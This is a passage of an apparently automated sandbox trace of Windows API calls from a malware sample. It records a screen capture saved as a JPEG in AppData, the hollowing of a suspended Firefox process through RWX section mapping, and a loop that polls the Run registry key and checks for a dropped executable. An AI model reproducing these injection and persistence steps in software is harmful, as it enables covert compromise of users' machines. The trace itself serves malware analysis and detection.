(hdc=0x2901071a, h=0x24050907) returned 0x185000f [0107.889] BitBlt (hdc=0x2901071a, x=0, y=0, cx=1440, cy=900, hdcSrc=0x2401080f, x1=0, y1=0, rop=0xcc0020) returned 1 [0107.890] GdiplusStartup (in: token=0x24e7a4, input=0x24e770, output=0x0 | out: token=0x24e7a4, output=0x0) returned 0x0 [0107.893] GdipCreateBitmapFromHBITMAP (hbm=0x24050907, hpal=0x0, bitmap=0x24e7a0) returned 0x0 [0107.921] GdipGetImageEncodersSize (numEncoders=0x24e43c, size=0x24e438) returned 0x0 [0107.922] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x12f9a8 | out: encoders=0x12f9a8) returned 0x0 [0107.922] GdipSaveImageToFile (image=0x25a2230, filename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogim.jpeg", clsidEncoder=0x24e760*(Data1=0x557cf401, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0107.956] GdiplusShutdown (token=0x28f34) [0107.983] DeleteObject (ho=0x24050907) returned 1 [0107.983] DeleteObject (ho=0x2901071a) returned 1 [0107.984] ReleaseDC (hWnd=0x0, hDC=0x2401080f) returned 1 [0107.986] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x24e2e4 | out: Value="C:\\Program Files") returned 0x0 [0107.986] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0x24e2b8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0107.986] NtCreateFile (in: FileHandle=0x24e2d8, DesiredAccess=0x120089, ObjectAttributes=0x24e2a0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e2c0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e2d8*=0x120, IoStatusBlock=0x24e2c0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0107.986] NtQueryInformationFile (in: FileHandle=0x120, IoStatusBlock=0x24e2c0, FileInformation=0x24e218, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e2c0, FileInformation=0x24e218) returned 0x0 [0107.986] NtClose (Handle=0x120) returned 0x0 [0107.995] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0x24e088, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0107.995] NtCreateFile (in: FileHandle=0x24e0a8, DesiredAccess=0x120089, ObjectAttributes=0x24e070*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e090, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e0a8*=0x120, IoStatusBlock=0x24e090*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0107.995] NtQueryInformationFile (in: FileHandle=0x120, IoStatusBlock=0x24e090, FileInformation=0x24dfe8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e090, FileInformation=0x24dfe8) returned 0x0 [0107.997] NtReadFile (in: FileHandle=0x120, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x24e090, Buffer=0x12ffc8, BufferLength=0x43470, ByteOffset=0x24e000*=0, Key=0x0 | out: IoStatusBlock=0x24e090, Buffer=0x12ffc8*) returned 0x0 [0108.019] NtClose (Handle=0x120) returned 0x0 [0108.022] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0xc, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x24e584*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24e55c, hNewToken=0x0 | out: lpProcessInformation=0x24e55c*(hProcess=0x11c, hThread=0x120, dwProcessId=0xce4, dwThreadId=0xce8), hNewToken=0x0) returned 1 [0108.026] NtQueryInformationProcess (in: ProcessHandle=0x11c, ProcessInformationClass=0x0, ProcessInformation=0x24e088, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x24e088, ReturnLength=0x0) returned 0x0 [0108.026] NtReadVirtualMemory (in: ProcessHandle=0x11c, BaseAddress=0x7ffd9000, Buffer=0x24e2fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x24e2fc*, NumberOfBytesRead=0x0) returned 0x0 [0108.026] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x11c, BaseAddress=0x24e0a8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e0a4*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x24e0a8*=0x1f0000, SectionOffset=0x0, ViewSize=0x24e0a4*=0x9c4000) returned 0x0 [0108.026] NtCreateSection (in: SectionHandle=0x24e09c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x24e05c, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x24e09c*=0x128) returned 0x0 [0108.026] NtMapViewOfSection (in: SectionHandle=0x128, ProcessHandle=0xffffffff, BaseAddress=0x24e0a4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e05c*=0x109a00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24e0a4*=0x2aa0000, SectionOffset=0x0, ViewSize=0x24e05c*=0x10a000) returned 0x0 [0108.026] NtMapViewOfSection (in: SectionHandle=0x128, ProcessHandle=0x11c, BaseAddress=0x24e0a0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e098*=0x109a00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24e0a0*=0xbc0000, SectionOffset=0x0, ViewSize=0x24e098*=0x10a000) returned 0x0 [0108.032] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x2aa0000) returned 0x0 [0108.038] NtClose (Handle=0x128) returned 0x0 [0108.038] NtReadVirtualMemory (in: ProcessHandle=0x11c, BaseAddress=0x1240000, Buffer=0x24d0048, NumberOfBytesToRead=0x44000, NumberOfBytesRead=0x0 | out: Buffer=0x24d0048*, NumberOfBytesRead=0x0) returned 0x0 [0108.045] NtCreateSection (in: SectionHandle=0x24e348, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x24e090, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x24e348*=0x128) returned 0x0 [0108.045] NtMapViewOfSection (in: SectionHandle=0x128, ProcessHandle=0xffffffff, BaseAddress=0x24e34c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e090*=0x44000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24e34c*=0x690000, SectionOffset=0x0, ViewSize=0x24e090*=0x44000) returned 0x0 [0108.047] NtUnmapViewOfSection (ProcessHandle=0x11c, BaseAddress=0x1240000) returned 0x0 [0108.050] NtMapViewOfSection (in: SectionHandle=0x128, ProcessHandle=0x11c, BaseAddress=0x24e350*=0x1240000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e57c*=0x44000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24e350*=0x1240000, SectionOffset=0x0, ViewSize=0x24e57c*=0x44000) returned 0x0 [0108.050] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x690000) returned 0x0 [0108.053] NtResumeThread (in: ThreadHandle=0x120, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0108.053] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x124) returned 0x0 [0108.053] NtEnumerateValueKey (in: KeyHandle=0x124, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0108.053] NtClose (Handle=0x124) returned 0x0 [0108.053] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.053] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0108.053] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.053] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0108.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, RegionSize=0x24e818*=0x10000) returned 0x0 [0108.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, ResultLength=0x0) returned 0x0 [0108.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0108.107] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0113.105] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x124) returned 0x0 [0113.105] NtEnumerateValueKey (in: KeyHandle=0x124, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0113.106] NtClose (Handle=0x124) returned 0x0 [0113.106] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.106] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0113.106] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.106] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0113.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, RegionSize=0x24e818*=0x10000) returned 0x0 [0113.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, ResultLength=0x0) returned 0x0 [0113.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0113.158] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0118.160] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x124) returned 0x0 [0118.160] NtEnumerateValueKey (in: KeyHandle=0x124, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0118.160] NtClose (Handle=0x124) returned 0x0 [0118.160] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.160] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0118.160] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.160] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0118.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, RegionSize=0x24e818*=0x10000) returned 0x0 [0118.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, ResultLength=0x0) returned 0x0 [0118.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0118.200] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0123.199] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x124) returned 0x0 [0123.199] NtEnumerateValueKey (in: KeyHandle=0x124, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0123.199] NtClose (Handle=0x124) returned 0x0 [0123.199] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0123.199] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0123.199] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0123.199] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0123.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, RegionSize=0x24e818*=0x10000) returned 0x0 [0123.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, ResultLength=0x0) returned 0x0 [0123.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0123.238] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0128.237] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x124) returned 0x0 [0128.237] NtEnumerateValueKey (in: KeyHandle=0x124, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0128.237] NtClose (Handle=0x124) returned 0x0 [0128.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0128.237] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0128.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0128.238] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0128.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, RegionSize=0x24e818*=0x10000) returned 0x0 [0128.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, ResultLength=0x0) returned 0x0 [0128.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0128.277] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0133.276] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x124) returned 0x0 [0133.276] NtEnumerateValueKey (in: KeyHandle=0x124, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0133.276] NtClose (Handle=0x124) returned 0x0 [0133.277] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0133.277] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0133.277] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0133.277] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0133.277] NtAllocateVirtualMemory (in: 